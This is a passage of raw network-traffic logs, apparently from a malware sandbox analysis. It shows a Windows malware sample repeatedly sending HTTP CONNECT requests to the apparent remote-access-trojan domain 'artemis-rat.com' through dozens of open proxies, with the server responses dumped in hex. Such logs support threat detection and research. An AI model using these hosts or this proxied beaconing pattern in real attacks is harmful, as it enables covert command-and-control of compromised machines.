                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1395192.168.2.454323172.67.187.242807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.766123056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.920511007 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1396192.168.2.45434250.62.134.139626077284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.767293930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.366478920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.866761923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866624117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.868762016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:29.866656065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866460085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.757126093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.569379091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1397192.168.2.454253196.20.125.12980837284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.768065929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1398192.168.2.454370104.16.105.106807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.768162012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.922394037 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:23 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1399192.168.2.453838162.241.46.6460977284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.769561052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.868207932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069708109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.069576979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.069416046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:00.072263956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:12.085037947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:36.210033894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:24.209997892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1400192.168.2.454217120.78.191.68807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.769757986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.101866961 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1401192.168.2.45429359.124.9.6731287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:23.769989967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.201756954 CET39INHTTP/1.0 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1402192.168.2.454386104.23.107.172807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.015630960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.169905901 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1403192.168.2.454382104.21.223.181807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.015650988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.170340061 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1404192.168.2.453743144.48.111.786747284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.020919085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.586200953 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1405192.168.2.45429147.243.177.21080887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.020966053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.663404942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.569557905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.366846085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.029712915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.655704975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:38.328572989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:45.569432020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:59.928699017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1406192.168.2.45449047.236.85.1134437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.027456045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1407192.168.2.45424558.58.68.218108007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.027458906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1408192.168.2.454423104.18.220.95807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.028413057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.183125019 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1409192.168.2.45436952.35.240.11910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.029390097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.234205961 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:24 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1410192.168.2.454290188.119.99.210807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:24.029512882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.757263899 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.757492065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.757283926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.569709063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:35.366368055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:39.257014036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.706072092 CET107INHTTP/1.0 200 Connection Established
                                              Proxy-agent: Apache/2.4.18 (Fedora) OpenSSL/1.0.2f-fips PHP/5.6.18


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
